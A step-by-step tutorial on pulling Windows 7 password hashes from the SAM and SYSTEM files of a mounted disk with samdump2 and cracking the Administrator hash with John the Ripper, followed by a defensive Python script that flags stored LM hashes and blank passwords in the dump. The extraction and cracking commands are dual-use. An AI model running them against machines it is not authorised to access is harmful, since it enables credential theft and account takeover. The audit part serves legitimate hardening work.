1. Boot the system from BackTrack 4 and wait for the operating system to load. Run "startx" to start the desktop.
2. Open Konsole and run "fdisk -l" to list the partitions. Devices named sda are SATA disks; devices named hda are IDE disks.
3. Create a directory to use as a mount point (the commands below use /mnt/sda2).
4. Mount the Windows partition on that directory:
"mount -t ntfs /dev/sda2 /mnt/sda2"
where /dev/sda2 is the partition holding your Windows 7 installation.
5. Change to the directory that holds the SAM file, where Windows keeps its password hashes. The SYSTEM hive in the same directory is needed as well, since the SAM is encrypted with a key derived from it. File names on the mounted NTFS volume are case-sensitive, so use the exact names shown in the directory listing.
6. Use samdump2 to extract the hashes from the SAM file into the file "pass1":
"samdump2 system sam > /root/pass1"
7. Use "grep" to pick the Administrator line out of that file and write it to "pass2":
"cat /root/pass1 | grep Administrator > /root/pass2"
8. Change to the directory /pentest/password/jtr.
9. Run ./john with no arguments to see the supported hash formats and cracking options.
10. Windows stores NTLM (NT) hashes, so tell John to use the NT format:
"./john --format=NT /root/pass2"
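samdump2 writes one pwdump-format line per account (username:RID:LM-hash:NT-hash:::), which is what step 7 filters with grep. Before cracking anything, a dump of your own machine already tells you two things worth checking as a defender: whether LM hashes are still being stored (the NoLMHash policy is not in effect) and whether any account has a blank password. The audit below is an added example, not part of the original walkthrough; it relies on the pwdump line layout and on the two well-known sentinel values Windows uses for "no LM hash" and "empty password". The sample dump is constructed: the hex values on the "legacy" and "backup" lines are made up and are not hashes of any real password.

```python
import re

# Sentinel values Windows stores when a hash is absent (well-known constants).
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"   # "no LM hash stored"
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

# samdump2 prints one pwdump-format line per account:
#   username:RID:LM-hash:NT-hash:::
PWDUMP_LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


def parse_pwdump_line(line):
    """Split one samdump2 output line into its fields; return None if malformed."""
    m = PWDUMP_LINE.match(line.strip())
    if not m:
        return None
    return {
        "user": m.group("user"),
        "rid": int(m.group("rid")),
        "lm": m.group("lm").lower(),
        "nt": m.group("nt").lower(),
    }


def audit_account(rec):
    """Return the list of weaknesses visible in one parsed account record."""
    findings = []
    if rec["lm"] != EMPTY_LM_HASH:
        # An LM hash is present: the password is also stored in the weak
        # LM form, which means NoLMHash hardening is not applied.
        findings.append("LM hash stored (NoLMHash policy not in effect)")
    if rec["nt"] == EMPTY_NT_HASH:
        findings.append("blank password")
    return findings


def audit_dump(text):
    """Audit a whole samdump2 dump; returns {username: [findings]} for accounts with findings."""
    report = {}
    for line in text.splitlines():
        rec = parse_pwdump_line(line)
        if rec is None:
            continue  # skip headers, blank lines, or anything not in pwdump format
        findings = audit_account(rec)
        if findings:
            report[rec["user"]] = findings
    return report


# Constructed sample dump: the Administrator line carries the two sentinel
# values (no LM hash, blank password); the "legacy" and "backup" lines use
# made-up 32-hex values standing in for real LM/NT hashes.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
legacy:1001:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
backup:1002:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
this line is not a pwdump record
"""

if __name__ == "__main__":
    for user, findings in audit_dump(SAMPLE_DUMP).items():
        print(user + ": " + "; ".join(findings))
```

Run it against the real /root/pass1 from step 6 by reading the file into audit_dump. An account that shows up with "LM hash stored" is the one to fix first: enabling the NoLMHash policy and changing the password removes the LM copy, after which the line shows the aad3b... sentinel again.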